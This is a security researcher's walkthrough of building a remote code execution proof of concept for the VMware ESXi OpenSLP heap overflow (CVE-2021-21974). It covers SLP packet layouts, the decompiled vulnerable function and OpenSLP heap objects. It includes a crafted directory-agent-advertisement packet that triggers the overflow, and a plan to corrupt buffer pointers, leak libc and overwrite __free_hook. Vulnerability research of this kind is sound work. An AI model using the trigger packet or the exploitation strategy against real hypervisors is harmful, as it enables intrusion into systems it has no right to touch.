My RCE PoC walkthrough for (CVE-2021-21974) VMware ESXi OpenSLP heap-overflow vulnerability

Original text by Johnny Yu (@straight_blast)

During a recent engagement, I discovered a machine running VMware ESXi 6.7.0. After checking for known vulnerabilities associated with this version of the software, I identified that it may be vulnerable to the ESXi OpenSLP heap overflow (CVE-2021-21974). Through googling, I found a blog post by Lucas Leong (@_wmliang_) of Trend Micro’s Zero Day Initiative, the security researcher who found this bug. Lucas wrote a brief overview of how to exploit the vulnerability but shared no reference to a PoC. Since I couldn’t find any existing PoC on the internet, I thought it would be neat to develop an exploit based on Lucas’ approach. Before proceeding, I highly encourage readers to review Lucas’ blog to get an overview of the bug and exploitation strategy from the finder’s perspective.

Setup

To set up a test environment, I need a vulnerable copy of VMware ESXi for testing and debugging. VMware offers a trial version of ESXi for download. Setup is straightforward: deploy the image through VMware Fusion or a similar tool. Once the installation completed, I used the web interface to enable SSH. To debug the ‘slpd’ binary on the server, I used the gdbserver that comes with the image. To talk to the gdbserver, I used SSH local port forwarding:

ssh -L 1337:localhost:1337 root@<esxi-ip-address> -p 22

On the ESXi server, I attached gdbserver to ‘slpd’ as follows:

/etc/init.d/slpd restart ; sleep 1 ; gdbserver --attach localhost:1337 `ps | grep slpd | awk '{print $1}'`

Lastly, on my local gdb client, I connected to the gdbserver with the following command:

target remote localhost:1337

Service Location Protocol

The Service Location Protocol is a service discovery protocol that allows connecting devices to identify services that are available within the local area network by querying a directory server. This is similar to a person walking into a shopping center and looking at the directory listing to see what stores are in the mall. To keep this brief, a device can query about a service and its location by making a ‘service request’ and specifying the type of service it wants to look up with a URL.

For example, to look up the VMwareInfrastructure service from the directory server, the device will make a request with ‘service:VMwareInfrastructure’ as the URL. The server will respond with something like ‘service:VMwareInfrastructure://localhost.localdomain’.

A device can also collect additional attributes and meta-data about a service by making an ‘attribute request’ supplying the same URL. Devices that want to be added to the directory can submit a ‘service registration’. This request will include information such as the IP of the device that is making the announcement, the type of service, and any meta-data that it wants to share. There are more functions that SLP can perform, but the last message type I am interested in is the ‘directory agent advertisement’ because this is where the vulnerability is. The ‘directory agent advertisement’ is a broadcast message sent by the server to let devices on the network know whom to reach out to if they want to query about a service and its location. To learn more about SLP, please see RFC 2608, which the packet diagrams below are taken from.

SLP Packet Structure

While the layout differs slightly between SLP message types, they generally follow a header + body format.

A ‘service request’ packet looks like

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       Service Location header (function = SrvRqst = 1)        |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      length of <PRList>       |        <PRList> String        \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |   length of <service-type>    |    <service-type> String      \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |    length of <scope-list>     |     <scope-list> String       \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |  length of predicate string   |  Service Request <predicate>  \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |  length of <SLP SPI> string   |       <SLP SPI> String        \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-8.1)

[SLP Client-1] connect

Header:  bytearray(b'\x02\x01\x00\x00=\x00\x00\x00\x00\x00\x00\x05\x00\x02en')
Body:  bytearray(b'\x00\x00\x00\x1cservice:VMwareInfrastructure\x00\x07DEFAULT\x00\x00\x00\x00')

length of <PRList>:  0x0000
<PRList> String:  b''
length of <service-type>:  0x001c
<service-type> string:  b'service:VMwareInfrastructure'
length of <scope-list>:  0x0007
<scope-list> string:  b'DEFAULT'
length of predicate string:  0x0000
Service Request <predicate>:  b''
length of <SLP SPI> string:  0x0000
<SLP SPI> String:  b''

[SLP Client-1] service request
[SLP Client-1] recv:  b'\x02\x02\x00\x00N\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x00\x00\x00\x01\x00\xff\xff\x004service:VMwareInfrastructure://localhost.localdomain\x00'
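The header and body in the dump above can be reproduced with a few lines of Python. This is only a minimal sketch, not the code the dump was produced with: the helper names (`slp_header`, `length_prefixed`, `service_request`) are made up for illustration, and the header layout is the 16-byte SLPv2 header visible in the dump (version, function ID, 3-byte total length, flags, next-extension offset, XID, language tag).

```python
import struct


def slp_header(function_id, body_len, xid, lang=b"en"):
    """Build an SLPv2 header (hypothetical helper, layout as in the dump above)."""
    total_len = 14 + len(lang) + body_len      # fixed fields + language tag + body
    return (
        bytes([2, function_id])                # version 2, function ID
        + total_len.to_bytes(3, "big")         # 3-byte total packet length
        + b"\x00\x00"                          # flags
        + b"\x00\x00\x00"                      # next extension offset
        + struct.pack(">HH", xid, len(lang))   # XID, language tag length
        + lang
    )


def length_prefixed(value):
    """Encode a field as a 2-byte big-endian length followed by the bytes."""
    return struct.pack(">H", len(value)) + value


def service_request(service_type, scopes, xid):
    """Return (header, body) for a 'service request' (function ID 1)."""
    body = (
        length_prefixed(b"")              # <PRList>
        + length_prefixed(service_type)   # <service-type>
        + length_prefixed(scopes)         # <scope-list>
        + length_prefixed(b"")            # predicate
        + length_prefixed(b"")            # <SLP SPI>
    )
    return slp_header(1, len(body), xid), body


header, body = service_request(b"service:VMwareInfrastructure", b"DEFAULT", xid=5)
print("Header: ", header)
print("Body:   ", body)
```

With the XID set to 5, the two printed values match the ‘Header’ and ‘Body’ lines of the dump byte for byte, which is a quick way to sanity-check the field order.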

An ‘attribute request’ packet looks like

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       Service Location header (function = AttrRqst = 6)       |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       length of PRList        |        <PRList> String        \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |         length of URL         |              URL              \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |    length of <scope-list>     |      <scope-list> string      \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |  length of <tag-list> string  |       <tag-list> string       \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |   length of <SLP SPI> string  |        <SLP SPI> string       \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-10.3)
  
[SLP Client-1] connect
 
Header:  bytearray(b'\x02\x06\x00\x00=\x00\x00\x00\x00\x00\x00\x0c\x00\x02en')
Body:  bytearray(b'\x00\x00\x00\x1cservice:VMwareInfrastructure\x00\x07DEFAULT\x00\x00\x00\x00')

length of PRList:  0x0000
<PRList> String:  b''
length of URL:  0x001c
URL:  b'service:VMwareInfrastructure'
length of <scope-list>:  0x0007
<scope-list> string:  b'DEFAULT'
length of <tag-list> string:  0x0000
<tag-list> string:  b''
length of <SLP SPI> string:  0x0000
<SLP SPI> string:  b''

[SLP Client-1] attribute request
[SLP Client-1] recv:  b'\x02\x07\x00\x00w\x00\x00\x00\x00\x00\x00\x0c\x00\x02en\x00\x00\x00b(product="VMware ESXi 6.7.0 build-14320388"),(hardwareUuid="23F14D56-C9F4-64FF-C6CE-8B0364D5B2D9")\x00' 
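To read a reply like the one above, the same header layout can be walked in reverse. The sketch below is an illustration under assumptions rather than code from the exploit: `parse_header` and `parse_attr_reply` are hypothetical helper names, and the reply body is assumed to be a 2-byte error code followed by a length-prefixed attribute list, which is what the received bytes look like.

```python
import struct


def parse_header(packet):
    """Split an SLPv2 packet into header fields and body (hypothetical helper)."""
    version, function_id = packet[0], packet[1]
    total_len = int.from_bytes(packet[2:5], "big")       # 3-byte total length
    xid, lang_len = struct.unpack_from(">HH", packet, 10)
    body_offset = 14 + lang_len
    header = {
        "version": version,
        "function_id": function_id,
        "length": total_len,
        "xid": xid,
        "lang": packet[14:body_offset],
    }
    return header, packet[body_offset:total_len]


def parse_attr_reply(body):
    """Return (error_code, attr_list) from an attribute reply body."""
    error_code, attr_len = struct.unpack_from(">HH", body, 0)
    return error_code, body[4:4 + attr_len]


# The reply received in the dump above.
reply = (b'\x02\x07\x00\x00w\x00\x00\x00\x00\x00\x00\x0c\x00\x02en\x00\x00\x00b'
         b'(product="VMware ESXi 6.7.0 build-14320388"),'
         b'(hardwareUuid="23F14D56-C9F4-64FF-C6CE-8B0364D5B2D9")\x00')

header, body = parse_header(reply)
error_code, attrs = parse_attr_reply(body)
print(header)
print(error_code, attrs)
```

The function ID in the reply is 7 and the XID echoes the 0x000c sent in the request, so replies can be matched back to the client that asked.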

A ‘service registration’ packet looks like

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |         Service Location header (function = SrvReg = 3)       |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                          <URL-Entry>                          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     | length of service type string |        <service-type>         \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |     length of <scope-list>    |         <scope-list>          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |  length of attr-list string   |          <attr-list>          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |# of AttrAuths |(if present) Attribute Authentication Blocks...\
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-8.3)
 
      URL Entries
      
      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |   Reserved    |          Lifetime             |   URL Length  |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |URL len, contd.|            URL (variable length)              \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |# of URL auths |            Auth. blocks (if any)              \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-4.3)
  
[SLP Client-1] connect

Header:  bytearray(b'\x02\x03\x00\x003\x00\x00\x00\x00\x00\x00\x14\x00\x02en')
Body:  bytearray(b'\x00\x00x\x00\t127.0.0.1\x00\x00\x0bservice:AAA\x00\x07default\x00\x03BBB\x00')

<URL-Entry>: 

   Reserved:  0x00
   Lifetime:  0x0078
   URL Length:  0x0009
   URL (variable length):  b'127.0.0.1'
   # of URL auths:  0x00
   Auth. blocks (if any):  b''
   
length of service type string:  0x000b
<service-type>:  b'service:AAA'
length of <scope-list>:  0x0007
<scope-list>:  b'default'
length of attr-list string:  0x0003
<attr-list>:  b'BBB'
# of AttrAuths:  0x00
(if present) Attribute Authentication Blocks...:  b''

[SLP Client-1] service registration
[SLP Client-1] recv:  b'\x02\x05\x00\x00\x12\x00\x00\x00\x00\x00\x00\x14\x00\x02en\x00\x00'

Lastly, a ‘directory agent advertisement’ packet looks like

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Service Location header (function = DAAdvert = 8)      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |          Error Code           |  DA Stateless Boot Timestamp  |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |DA Stateless Boot Time,, contd.|         Length of URL         |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     \                              URL                              \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |     Length of <scope-list>    |         <scope-list>          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |     Length of <attr-list>     |          <attr-list>          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |    Length of <SLP SPI List>   |     <SLP SPI List> String     \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     | # Auth Blocks |         Authentication block (if any)         \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-8.5)

[SLP Client-1] connect

Header:  bytearray(b'\x02\x08\x00\x00N\x00\x00\x00\x00\x00\x00\x00\x00\x02en')
Body:  bytearray(b'\x00\x00`\xa4`S\x00+service:VMwareInfrastructure:/192.168.0.191\x00\x03BBB\x00\x00\x00\x00\x00\x00')

Error Code:  0x0000
Boot Timestamp:  0x60a46053
Length of URL:  0x002b
URL:  b'service:VMwareInfrastructure:/192.168.0.191'
Length of <scope-list>:  0x0003
<scope-list>:  b'BBB'
Length of <attr-list>:  0x0000
<attr-list>:  0x0000
Length of <SLP SPI List>:  0x0000
<SLP SPI List> String:  b''
# Auth Blocks:  0x0000
Authentication block (if any):  b''

[SLP Client-1] directory agent advertisement
[SLP Client-1] recv:  b''
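The field dump above can be reproduced by walking the body with the declared lengths. This is a small sketch for illustration; `read_lv` and `parse_da_advert` are hypothetical names, and the parser stops after the authentication block count because the sample carries no authentication blocks.

```python
import struct


def read_lv(buf, offset):
    """Read a 2-byte big-endian length and that many bytes; return (value, new offset)."""
    (length,) = struct.unpack_from(">H", buf, offset)
    start = offset + 2
    return buf[start:start + length], start + length


def parse_da_advert(body):
    """Parse a 'directory agent advertisement' body into its fields."""
    error_code, boot_timestamp = struct.unpack_from(">HI", body, 0)
    offset = 6
    url, offset = read_lv(body, offset)
    scopes, offset = read_lv(body, offset)
    attrs, offset = read_lv(body, offset)
    spi_list, offset = read_lv(body, offset)
    return {
        "error_code": error_code,
        "boot_timestamp": boot_timestamp,
        "url": url,
        "scopes": scopes,
        "attrs": attrs,
        "spi_list": spi_list,
        "auth_blocks": body[offset],
    }


# Body taken from the dump above.
sample = (b'\x00\x00`\xa4`S\x00+service:VMwareInfrastructure:/192.168.0.191'
          b'\x00\x03BBB\x00\x00\x00\x00\x00\x00')
fields = parse_da_advert(sample)
for name, value in fields.items():
    print(f"{name}: {value!r}")
```

Note that this parser only trusts the declared lengths. It never treats the URL as a C string, which is the detail that matters in the next section.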

The Bug

As noted in Lucas’ blog, the bug is in the ‘SLPParseSrvUrl’ function, which gets called when a ‘directory agent advertisement’ message is being processed.

undefined4 SLPParseSrvUrl(int param_1,char *param_2,void **param_3)

{
  char cVar1;
  void **__ptr;
  char *pcVar2;
  char *pcVar3;
  void *pvVar4;
  char *pcVar5;
  char *__src;
  char *local_28;
  void **local_24;
  
  if (param_2 == (char *)0x0) {
    return 0x16;
  }
  *param_3 = (void *)0x0;
  __ptr = (void **)calloc(1,param_1 + 0x1d);                                       [1]
  if (__ptr == (void **)0x0) {
    return 0xc;
  }
  pcVar2 = strstr(param_2,":/");                                                   [2]
  if (pcVar2 == (char *)0x0) {
    free(__ptr);
    return 0x16;
  }
  pcVar5 = param_2 + param_1;
  memcpy((void *)((int)__ptr + 0x15),param_2,(size_t)(pcVar2 + -(int)param_2));    [3]

At [1], 0x1d is added to the length of the URL to form the final size passed to ‘calloc’. At [2], the ‘strstr’ function is called to find the position of the substring “:/” within the URL. At [3], the content of the URL before the substring “:/” is copied into the newly ‘calloced’ memory from [1].

Another thing to note is that the ‘strstr’ function stops searching at the first null character, so it returns 0 if the substring “:/” does not exist before that point.

I speculate that VMware’s test cases only tried ‘scopes’ with a length below 256. If we look at the following ‘directory agent advertisement’ layout snippets, we see that the two-byte length of ‘scopes’ in sample 1 (0x0003) starts with a null byte. This null byte accidentally acts as the string terminator for ‘URL’ since it sits right after it. If the length of ‘scopes’ is 256 or more and neither of its two bytes is zero (as in sample 2, 0x0298), there is no null byte after ‘URL’, and therefore the ‘strstr’ function will read past the ‘URL’ and continue seeking the substring “:/” in ‘scopes’.

Sample 1 - won't trigger bug:

Body:  bytearray(b'\x00\x00`\xa4`S\x00+service:VMwareInfrastructure:/192.168.0.191\x00\x03BBB\x00\x00\x00\x00\x00\x00')

Error Code:  0x0000
Boot Timestamp:  0x60a46053
Length of URL:  0x002b
URL:  b'service:VMwareInfrastructure:/192.168.0.191'
****** Length of <scope-list>:  0x0003 ******
<scope-list>:  b'BBB'
Length of <attr-list>:  0x0000
<attr-list>:  0x0000
Length of <SLP SPI List>:  0x0000
<SLP SPI List> String:  b''
# Auth Blocks:  0x0000
Authentication block (if any):  b''

Sample 2 - triggers the bug:

Body:  bytearray(b'\x00\x00`\xa4\x9a\x14\x00\x18AAAAAAAAAAAAAAAAAAAAAAAA\x02\x98BBBBBBBBBBBBBA\x01:/CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x00\x00\x00\x00\x00\x00')

Error Code:  0x0000
Boot Timestamp:  0x60a49a14
Length of URL:  0x0018
URL:  b'AAAAAAAAAAAAAAAAAAAAAAAA'
****** Length of <scope-list>:  0x0298 ******
<scope-list>:  b'BBBBBBBBBBBBBA\x01:/CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC'
Length of <attr-list>:  0x0000
<attr-list>:  0x0000
Length of <SLP SPI List>:  0x0000
<SLP SPI List> String:  b''
# Auth Blocks:  0x0000
Authentication block (if any):  b''

Therefore, the ‘memcpy’ call will lead to a heap overflow because the source contains content from ‘URL’ + part of ‘scopes’ while the destination only has space to fit ‘URL’.
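The difference between the two samples can be checked offline with a small model of the C string search. This is a sketch under assumptions: `c_strstr` only mimics the stop-at-first-null behaviour of ‘strstr’, `check_da_advert` is a hypothetical helper, the 0x1d and 0x15 constants are read off the decompiled snippet above, and the second body is a shortened stand-in for sample 2 rather than the full packet. The "room" figure is the requested allocation only; the real allocator may round the chunk up.

```python
ALLOC_EXTRA = 0x1d   # calloc(1, url_len + 0x1d) at [1]
COPY_OFFSET = 0x15   # memcpy destination is __ptr + 0x15 at [3]


def c_strstr(buf, start, needle):
    """Mimic C strstr: search from start, but never past the first null byte."""
    nul = buf.find(b"\x00", start)
    end = len(buf) if nul == -1 else nul
    index = buf.find(needle, start, end)
    return None if index == -1 else index


def check_da_advert(body):
    """Return (bytes copied, room after the copy offset, overflows?) or None."""
    url_len = int.from_bytes(body[6:8], "big")
    url_start = 8
    hit = c_strstr(body, url_start, b":/")
    if hit is None:
        return None                       # the function bails out with 0x16
    copied = hit - url_start              # memcpy length at [3]
    room = url_len + ALLOC_EXTRA - COPY_OFFSET
    return copied, room, copied > room


sample_1 = (b'\x00\x00`\xa4`S\x00+service:VMwareInfrastructure:/192.168.0.191'
            b'\x00\x03BBB\x00\x00\x00\x00\x00\x00')
# Shortened stand-in for sample 2: same prefix, fewer trailing 'C' bytes.
sample_2 = (b'\x00\x00`\xa4\x9a\x14\x00\x18' + b'A' * 24 + b'\x02\x98'
            + b'B' * 13 + b'A\x01:/' + b'C' * 8 + b'\x00' * 6)

print(check_da_advert(sample_1))
print(check_da_advert(sample_2))
```

For sample 1 the search stops inside the URL, so the copy length stays below the requested allocation. For the sample 2 stand-in the match is only found inside ‘scopes’, and the copy length exceeds the room that was requested for a 0x18-byte URL.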

SLP Objects

Here I will go over the relevant SLP components as they serve as the building blocks for exploitation.

_SLPDSocket

Every client that connects to the ‘slpd’ daemon causes a ‘slpd-socket’ object to be created on the heap. This object contains information on the current state of the connection, such as whether it is in a reading state or a writing state. Other important information stored in this object includes the client’s IP address, the socket file descriptor in use for the connection, pointers to the ‘recv-buffer’ and ‘send-buffer’ for this specific connection, and pointers to the ‘slpd-socket’ objects created for prior and future established connections. The size of this object is fixed at 0xd0 and cannot be changed.

// https://github.com/openslp-org/openslp/blob/df695199138ce400c7f107804251ccc57a6d5f38/openslp/slpd/slpd_socket.h
/** Structure representing a socket
 */
typedef struct _SLPDSocket
{
   SLPListItem listitem;    
   sockfd_t fd;
   time_t age;    /* in seconds -- in unicast dgram sockets, this also drives the resend logic */
   int state;
   int can_send_mcast;  /*Instead of allocating outgoing sockets to for sending multicast messages, slpd
                          uses incoming unicast sockets that were bound to the network interface.  Unicast
                          sockets are used because some stacks use the multicast address as the source address
                          if the socket was bound to the multicast address.  Since we don't want to send
                          mcast out of all the unicast sockets, this flag is used*/

   /* addrs related to the socket */
   struct sockaddr_storage localaddr;
   struct sockaddr_storage peeraddr;
   struct sockaddr_storage mcastaddr;

   /* Incoming socket stuff */
   SLPBuffer recvbuf;
   SLPBuffer sendbuf;

   /* Outgoing socket stuff */
   int reconns; /*For stream sockets, this drives reconnect.  For unicast dgram sockets, this drives resend*/
   SLPList sendlist;
#if HAVE_POLL
   int fdsetnr;
#endif
} SLPDSocket;

(figure: memory layout for a _SLPDSocket object)

_SLPBuffer

All SLP message types received by the server will create at least two SLPBuffer objects. One is called ‘recv-buffer’, which stores the data received by the server from the client. Since I can control the size of the data I send from the client, I can control the size of the ‘recv-buffer’. The other SLPBuffer object is called ‘send-buffer’. This buffer stores the data that will be sent from the server to the client. The ‘send-buffer’ has a fixed size of 0x598 and I cannot control its size. Furthermore, the SLPBuffer has meta-data properties that point to the starting, current, and ending positions of said data.

//https://github.com/openslp-org/openslp/blob/df695199138ce400c7f107804251ccc57a6d5f38/openslp/common/slp_buffer.h
/** Buffer object holds SLP messages.
 */
typedef struct _SLPBuffer
{
   SLPListItem listitem;   /*!< @brief Allows SLPBuffers to be linked. */
   size_t allocated;       /*!< @brief Allocated size of buffer. */
   uint8_t * start;        /*!< @brief Points to start of space. */
   uint8_t * curpos;       /*!< @brief @p start < @c @p curpos < @p end */
   uint8_t * end;          /*!< @brief Points to buffer limit. */
} * SLPBuffer;

(figure: memory layout for a _SLPBuffer object)

SLP Socket State

The SLP Socket State defines the status of a particular connection. The state value is set in the _SLPDSocket object. A connection will either be calling ‘recv’ or ‘send’ depending on the state of the socket.

//https://github.com/openslp-org/openslp/blob/df695199138ce400c7f107804251ccc57a6d5f38/openslp/slpd/slpd_socket.h
/* Values representing a type or state of a socket */
#define SOCKET_PENDING_IO       100
#define SOCKET_LISTEN           0
#define SOCKET_CLOSE            1
#define DATAGRAM_UNICAST        2
#define DATAGRAM_MULTICAST      3
#define DATAGRAM_BROADCAST      4
#define STREAM_CONNECT_IDLE     5
#define STREAM_CONNECT_BLOCK    6   + SOCKET_PENDING_IO
#define STREAM_CONNECT_CLOSE    7   + SOCKET_PENDING_IO
#define STREAM_READ             8   + SOCKET_PENDING_IO
#define STREAM_READ_FIRST       9   + SOCKET_PENDING_IO
#define STREAM_WRITE            10  + SOCKET_PENDING_IO
#define STREAM_WRITE_FIRST      11  + SOCKET_PENDING_IO
#define STREAM_WRITE_WAIT       12  + SOCKET_PENDING_IO

(socket state constants defined in the OpenSLP source code)
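Because several of these macros are written as a sum, the value that actually sits in the ‘state’ field is not obvious at a glance. The short sketch below simply evaluates the constants listed above; the dictionary name `SOCKET_STATES` is made up for illustration.

```python
SOCKET_PENDING_IO = 100

# Values copied from the #define list above, with the sums evaluated.
SOCKET_STATES = {
    "SOCKET_LISTEN": 0,
    "SOCKET_CLOSE": 1,
    "DATAGRAM_UNICAST": 2,
    "DATAGRAM_MULTICAST": 3,
    "DATAGRAM_BROADCAST": 4,
    "STREAM_CONNECT_IDLE": 5,
    "STREAM_CONNECT_BLOCK": 6 + SOCKET_PENDING_IO,
    "STREAM_CONNECT_CLOSE": 7 + SOCKET_PENDING_IO,
    "STREAM_READ": 8 + SOCKET_PENDING_IO,
    "STREAM_READ_FIRST": 9 + SOCKET_PENDING_IO,
    "STREAM_WRITE": 10 + SOCKET_PENDING_IO,
    "STREAM_WRITE_FIRST": 11 + SOCKET_PENDING_IO,
    "STREAM_WRITE_WAIT": 12 + SOCKET_PENDING_IO,
}

for name, value in SOCKET_STATES.items():
    print(f"{name:<22} {value:>3}  0x{value:02x}")
```

The two states that come up later in the walkthrough, ‘STREAM_READ’ and ‘STREAM_WRITE’, evaluate to 108 (0x6c) and 110 (0x6e).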

It is important to understand the properties of _SLPDSocket, _SLPBuffer and the socket states because the exploitation process requires modifying those values.

Objectives, Expectations and Limitations

This section goes over the objectives that must be met to land a successful exploit.

Objective 1

Achieve remote code execution by leveraging the heap overflow to overwrite ‘__free_hook’ so that it points to shellcode or a ROP chain.

Expectation 1

If I can overwrite the ‘position’ pointers in a _SLPBuffer ‘recv-buffer’ object, I can force incoming data to the server to be written to an arbitrary memory location.

Objective 2

In order to know the address of ‘__free_hook’, I have to leak an address referencing the libc library.

Expectation 2

If I can overwrite the ‘position’ pointers in a _SLPBuffer ‘send-buffer’ object, I can force outgoing data from the server to be read from an arbitrary memory location.
